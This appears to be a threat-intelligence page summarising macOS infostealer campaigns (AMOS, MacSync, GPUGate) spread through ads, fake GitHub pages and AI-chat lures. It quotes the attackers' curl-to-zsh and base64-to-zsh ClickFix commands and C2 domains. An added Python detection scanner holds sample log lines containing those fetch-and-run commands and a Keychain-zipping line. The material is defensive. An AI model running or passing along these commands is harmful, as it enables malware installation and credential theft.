GPUGate Malware Campaign Targets IT Firms in Western Europe
Summary
The **GPUGate malware campaign** continues to evolve, now leveraging **Claude AI artifacts and Google Ads** to distribute **MacSync and AMOS infostealers** via **ClickFix attacks**. Over **15,600 users** have accessed malicious Claude-generated guides, which instruct victims to execute Terminal commands fetching malware payloads. This follows earlier waves abusing **ChatGPT/Grok chats, fake GitHub repositories, and malvertising** to deploy stealers targeting credentials, crypto wallets, and system data. The campaign, active since **April 2023**, has expanded from traditional phishing to **abusing AI ecosystems, supply-chain weaknesses, and trusted platforms** (e.g., Homebrew, LogMeIn, AI assistants). Russian-speaking actors operate **AMOS as a Malware-as-a-Service (MaaS)**, with stolen logs sold in underground markets to fuel fraud, ransomware, and account takeovers. The latest **Claude artifact abuse** underscores the shift toward **high-impact, scalable distribution channels**, exploiting weak platform vetting and user trust in AI-generated content. Organizations should monitor for **suspicious Terminal activity, C2 traffic to domains like `a2abotnet[.]com`, and unauthorized data egress** while educating users on **ClickFix-style lures** and unverified AI tool instructions.
Timeline
- 13.02.2026 22:21 · 1 article
Claude AI artifacts abused in ClickFix attacks distributing MacSync infostealer
Threat actors are now **abusing Claude AI artifacts** (publicly shared, unverified LLM-generated content) to distribute the **MacSync infostealer** via **ClickFix attacks**. Malicious Google Ads promote these artifacts for queries like "online DNS resolver" and "macOS CLI disk space analyzer," directing users to **Claude-hosted guides or fake Apple Support pages** on Medium. The guides instruct victims to paste **obfuscated Terminal commands** (`echo "..." | base64 -D | zsh` or `curl -SsLfk "https://raxelpak[.]com/..." | zsh`), which fetch a **second-stage payload** from the same C2 (`raxelpak[.]com`). The **MacSync infostealer** exfiltrates data (Keychain, browser sessions, crypto wallets) to `a2abotnet[.]com/gate` as a ZIP archive (`/tmp/osalogging.zip`), with **fallback chunked uploads** if the initial exfiltration fails. Over **15,600 users** accessed one malicious artifact, its view count having risen from 12,300 within days, indicating rapid victim exposure. This tactic **expands prior LLM abuse** (ChatGPT/Grok chats) and demonstrates threat actors' adaptability in exploiting **new AI platforms** for scalable malware distribution. The **same operator** likely controls both command variants, given the shared C2 infrastructure.
Sources:
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
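The two command shapes quoted in this entry (`curl ... | zsh` and `echo "..." | base64 -D | zsh`) and the C2 and staging indicators it names can be hunted for in shell or EDR command-line telemetry. The following Python scanner is an added example and not code from the page or any cited vendor; the record format, the sample lines, and the placeholder URL path (the page elides the real one) are assumptions.

```python
# Added defensive example (not code from the page or any cited vendor). Flags the
# two ClickFix command shapes quoted above and the page's C2/staging indicators.
import base64
import re
import shlex

PAGE_C2_DOMAINS = {"raxelpak.com", "a2abotnet.com"}  # quoted on the page, undefanged
PAGE_ARTIFACT_PATHS = {"/tmp/osalogging.zip"}
SHELLS = {"zsh", "bash", "sh"}
DOWNLOADERS = {"curl", "wget"}
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def split_pipeline(cmd):
    """Split a command line into pipeline stages (token lists) on unquoted '|'."""
    try:
        lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
        lex.whitespace_split = True
        tokens = list(lex)
    except ValueError:  # unbalanced quotes: fall back to a crude split
        return [s.split() for s in cmd.split("|") if s.split()]
    stages = [[]]
    for tok in tokens:
        if tok == "|":
            stages.append([])
        else:
            stages[-1].append(tok)
    return [s for s in stages if s]


def has_short_flag(tokens, letter):
    """True if a clustered short option such as -SsLfk contains the given letter."""
    return any(t.startswith("-") and not t.startswith("--") and letter in t[1:]
               for t in tokens)


def analyze_command(cmd, depth=0):
    """Return (rules, domains, decoded_text) for one command line."""
    rules, domains, decoded = [], set(DOMAIN_RE.findall(cmd)), ""
    stages = split_pipeline(cmd)
    heads = [s[0] for s in stages]
    for i, stage in enumerate(stages):
        head = stage[0]
        shell_after = any(h in SHELLS for h in heads[i + 1:])
        # Variant 1 on the page: curl -SsLfk "<url>" | zsh
        if head in DOWNLOADERS and shell_after:
            rules.append("pipe_to_shell")
            if head == "curl" and (has_short_flag(stage, "k") or "--insecure" in stage):
                rules.append("curl_insecure")
        # Variant 2 on the page: echo "<blob>" | base64 -D | zsh
        is_decode = "--decode" in stage or has_short_flag(stage, "D") or has_short_flag(stage, "d")
        if head == "base64" and is_decode and shell_after:
            rules.append("decode_to_shell")
            prev = stages[i - 1] if i > 0 else []
            if len(prev) > 1 and prev[0] == "echo":
                try:
                    decoded = base64.b64decode(prev[1], validate=True).decode("utf-8", "replace")
                except ValueError:  # binascii.Error is a ValueError: not a real blob
                    decoded = ""
                if decoded and depth < 2:  # look inside the blob for the real fetch
                    inner_rules, inner_domains, _ = analyze_command(decoded, depth + 1)
                    rules.extend("decoded:" + r for r in inner_rules)
                    domains |= inner_domains
    if domains & PAGE_C2_DOMAINS:
        rules.append("page_c2_domain")
    if any(p in cmd for p in PAGE_ARTIFACT_PATHS):
        rules.append("page_artifact_path")
    return rules, domains, decoded


def scan_log(text):
    """Scan records shaped '<timestamp> <user> <command line>' (an assumed format)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue
        rules, domains, decoded = analyze_command(parts[2])
        if rules:
            findings.append({"line": n, "cmd": parts[2], "rules": rules,
                             "domains": domains, "decoded": decoded})
    return findings


# Constructed sample records. The blob wraps the page's curl pattern; the URL path
# is a placeholder because the page elides it.
_ENCODED = base64.b64encode(
    b'curl -SsLfk "https://raxelpak.com/PLACEHOLDER_PATH" | zsh').decode()
SAMPLE_LOG = "\n".join([
    "2026-02-13T10:02:11Z alice brew install jq",
    '2026-02-13T10:05:40Z alice curl -SsLfk "https://raxelpak.com/PLACEHOLDER_PATH" | zsh',
    f'2026-02-13T10:07:03Z bob echo "{_ENCODED}" | base64 -D | zsh',
    "2026-02-13T10:09:55Z carol curl -fsSL https://example.org/notes.txt -o notes.txt",
    "2026-02-13T10:11:20Z dave zip -r /tmp/osalogging.zip ~/Library/Keychains",
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {', '.join(f['rules'])} domains={sorted(f['domains'])}")
```

The decoded blob is reported alongside the finding so an analyst can see the fetch URL the `echo | base64 -D` variant hides without running it.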
- 12.02.2026 16:25 · 1 article
AMOS infostealer exploits AI assistant ecosystem via ClawHavoc campaign
A new **ClawHavoc campaign** targets macOS users by poisoning the **OpenClaw and ClawHub AI assistant skill marketplace** with malicious add-ons (e.g., crypto tools, productivity utilities, Google Workspace integrations). These add-ons deploy the AMOS infostealer, which exfiltrates credentials, browser sessions, SSH keys, and cryptocurrency wallet data. The campaign exploits weak marketplace vetting and the popularity of AI tools, highlighting how threat actors adapt distribution channels to maximize infections. This follows earlier AMOS campaigns abusing **ChatGPT shared chats, fake GitHub repositories, and Google Ads** to deploy malware via ClickFix-style social engineering.
Sources:
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- 04.02.2026 09:42 · 2 articles
Microsoft warns of expanding macOS infostealer campaigns
Microsoft has warned that information-stealing attacks are rapidly expanding beyond Windows to target Apple macOS environments by leveraging cross-platform languages like Python and abusing trusted platforms for distribution at scale. The tech giant's Defender Security Research Team observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like **Atomic macOS Stealer (AMOS), MacSync, and DigitStealer**. **New developments** confirm the trend’s acceleration: threat actors now abuse **Claude AI artifacts** (public LLM-generated guides) and **Google Ads** to push **MacSync infostealers** via ClickFix lures, with over **15,600 users** exposed to a single malicious artifact. The campaigns use techniques like **fileless execution, native macOS utilities (e.g., `osascript`), and AppleScript automation** to facilitate data theft, including **browser credentials, iCloud Keychain, crypto wallets, and session data**. The starting point remains **malicious ads** (e.g., for 'HomeBrew,' 'DNS resolver tools') that redirect users to **fake support pages or AI-generated guides**, tricking them into executing Terminal commands that deploy malware.
Sources:
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
- 18.10.2025 18:02 · 2 articles
New malware payloads AMOS and Odyssey target macOS developers
The campaign targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms, using 'ClickFix' techniques to trick targets into executing commands in Terminal. Google Ads drive traffic to the malicious sites and promote them in Google Search results. The sites feature convincing download portals for fake apps and instruct users to copy a curl command into their Terminal to install them. The commands fetch and decode an 'install.sh' file, which downloads a payload binary, removes its quarantine flags, and so bypasses Gatekeeper prompts. The payload is either AMOS or Odyssey, executed on the machine after checking whether the environment is a virtual machine or an analysis system. The malware invokes sudo to run commands as root and collects detailed hardware and memory information about the host. It manipulates system services, for example killing OneDrive updater daemons, and interacts with macOS XPC services to blend its malicious activity with legitimate processes. It harvests sensitive information stored in the browser and cryptocurrency credentials, and exfiltrates them to the command and control (C2) server.
Sources:
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- 22.09.2025 22:44 · 2 articles
Threat actors view Mac users as low-hanging fruit
The threat actors may view Mac users as a low-hanging fruit due to the perception that Macs face fewer malware threats. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.
Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- 22.09.2025 18:36 · 3 articles
AMOS malware adds backdoor for persistent access
The Atomic (AMOS) malware now includes a backdoor component, giving attackers persistent, stealthy access to compromised systems. The AMOS malware is a malware-as-a-service operation available for $1,000/month, with stolen logs traded in underground markets for follow-on attacks. The latest **ClawHavoc campaign** demonstrates its evolving distribution tactics, bundling AMOS within malicious OpenClaw AI assistant add-ons to harvest credentials, crypto wallet data, and system information.
Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- 20.09.2025 10:07 · 4 articles
GPUGate campaign expands to macOS users through fake GitHub repositories
The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. The campaign now targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.
Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- 08.09.2025 18:02 · 7 articles
GPUGate Malware Campaign Targets IT Firms in Western Europe
The campaign has targeted a range of companies across the technology and financial sectors, including LastPass. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. The campaign now targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.

A new AMOS infostealer campaign abuses Google search ads to lure users into Grok and ChatGPT conversations that lead to installing the AMOS malware on macOS. The campaign was first spotted by researchers at Kaspersky, with a more detailed report by Huntress. The ClickFix attack begins with victims searching for macOS-related terms, leading to malicious instructions in AI chats. The malicious instructions are hosted on legitimate LLM platforms and contain commands to install the malware. The base64-encoded URL decodes into a bash script that loads a fake password prompt dialog. The script validates, stores, and uses the provided password to execute privileged commands, including downloading and executing the AMOS infostealer.

AMOS was first documented in April 2023 and is a malware-as-a-service (MaaS) operation targeting macOS systems exclusively. AMOS added a backdoor module earlier this year, allowing operators to execute commands, log keystrokes, and drop additional payloads. AMOS is dropped as a hidden file and scans for cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem. Persistence is achieved via a LaunchDaemon running a hidden AppleScript that restarts the malware if terminated. Users are advised to be vigilant and avoid executing commands they found online, especially if they don't fully understand what they do. Kaspersky noted that asking ChatGPT if the provided instructions are safe reveals they are not.

Microsoft has warned that information-stealing attacks are rapidly expanding beyond Windows to target Apple macOS environments by leveraging cross-platform languages like Python and abusing trusted platforms for distribution at scale. The tech giant's Defender Security Research Team observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. The campaigns use techniques like fileless execution, native macOS utilities, and AppleScript automation to facilitate data theft, including web browser credentials and session data, iCloud Keychain, and developer secrets. The starting point of these attacks is often a malicious ad, often served through Google Ads, that redirects users searching for tools like DynamicLake and artificial intelligence (AI) tools to fake sites that employ ClickFix lures, tricking them into infecting their own machines with malware.
Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
Information Snippets
- The GPUGate malware campaign targets IT and software development companies in Western Europe.
  First reported: 08.09.2025 18:02 · 3 sources, 4 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The campaign uses Google Ads and fake GitHub commits to deliver malware.
  First reported: 08.09.2025 18:02 · 3 sources, 6 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The attack began in December 2024 and uses a 128 MB Microsoft Software Installer (MSI) to evade detection.
  First reported: 08.09.2025 18:02 · 2 sources, 2 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The malware employs GPU-gated decryption to avoid analysis and detection.
  First reported: 08.09.2025 18:02 · 2 sources, 2 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The malware includes a Visual Basic Script that launches a PowerShell script with administrator privileges.
  First reported: 08.09.2025 18:02 · 2 sources, 2 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The PowerShell script adds Microsoft Defender exclusions, sets up scheduled tasks for persistence, and runs executable files from a downloaded ZIP archive.
  First reported: 08.09.2025 18:02 · 2 sources, 2 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The end goal is information theft and delivery of secondary payloads.
  First reported: 08.09.2025 18:02 · 2 sources, 2 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- The threat actors have native Russian language proficiency and use a cross-platform approach, including Atomic macOS Stealer (AMOS).
  First reported: 08.09.2025 18:02 · 2 sources, 6 articles. Sources:
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- The campaign targets macOS users through fake GitHub repositories.
  First reported: 20.09.2025 10:07 · 3 sources, 6 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The fake repositories impersonate popular tools like 1Password, Basecamp, Dropbox, and others.
  First reported: 20.09.2025 10:07 · 3 sources, 6 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The attacks use SEO poisoning to push malicious links to the top of search results.
  First reported: 20.09.2025 10:07 · 3 sources, 6 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The GitHub pages are created by multiple usernames to evade takedowns.
  First reported: 20.09.2025 10:07 · 3 sources, 6 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The malware is deployed via ClickFix-style instructions executed in the Terminal app.
  First reported: 20.09.2025 10:07 · 3 sources, 6 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Similar campaigns have used malicious sponsored Google Ads for Homebrew to distribute malware.
  First reported: 20.09.2025 10:07 · 3 sources, 5 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Threat actors have been using public GitHub repositories to host and distribute malicious payloads.
  First reported: 20.09.2025 10:07 · 3 sources, 5 articles. Sources:
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The Atomic (AMOS) malware is a malware-as-a-service operation available for $1,000/month.
  First reported: 22.09.2025 18:36 · 3 sources, 6 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems.
  First reported: 22.09.2025 18:36 · 3 sources, 6 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- AMOS infostealer targets macOS through a popular AI app — www.bleepingcomputer.com — 12.02.2026 16:25
- The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
  First reported: 22.09.2025 18:36 · 2 sources, 4 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The fake repositories use a 'download button' that directs visitors to a secondary site for installation commands.
  First reported: 22.09.2025 18:36 · 2 sources, 4 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The installation command performs a curl request to a base64-encoded URL to download the AMOS payload.
  First reported: 22.09.2025 18:36 · 2 sources, 4 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The campaign continues to evade takedowns by creating new repositories from multiple accounts.
  First reported: 22.09.2025 18:36 · 3 sources, 5 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Users are advised to be cautious of running commands they do not understand and to trust official vendor websites for software downloads.
  First reported: 22.09.2025 18:36 · 2 sources, 4 articles. Sources:
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The campaign has targeted a range of companies across the technology and financial sectors, including LastPass.
  First reported: 22.09.2025 22:44 · 3 sources, 3 articles. Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown.
  First reported: 22.09.2025 22:44 · 3 sources, 3 articles. Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results.
  First reported: 22.09.2025 22:44 · 3 sources, 3 articles. Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.
  First reported: 22.09.2025 22:44 · 3 sources, 4 articles. Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- The threat actors may view Mac users as a low-hanging fruit due to the perception that Macs face fewer malware threats.
  First reported: 22.09.2025 22:44 · 3 sources, 4 articles. Sources:
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
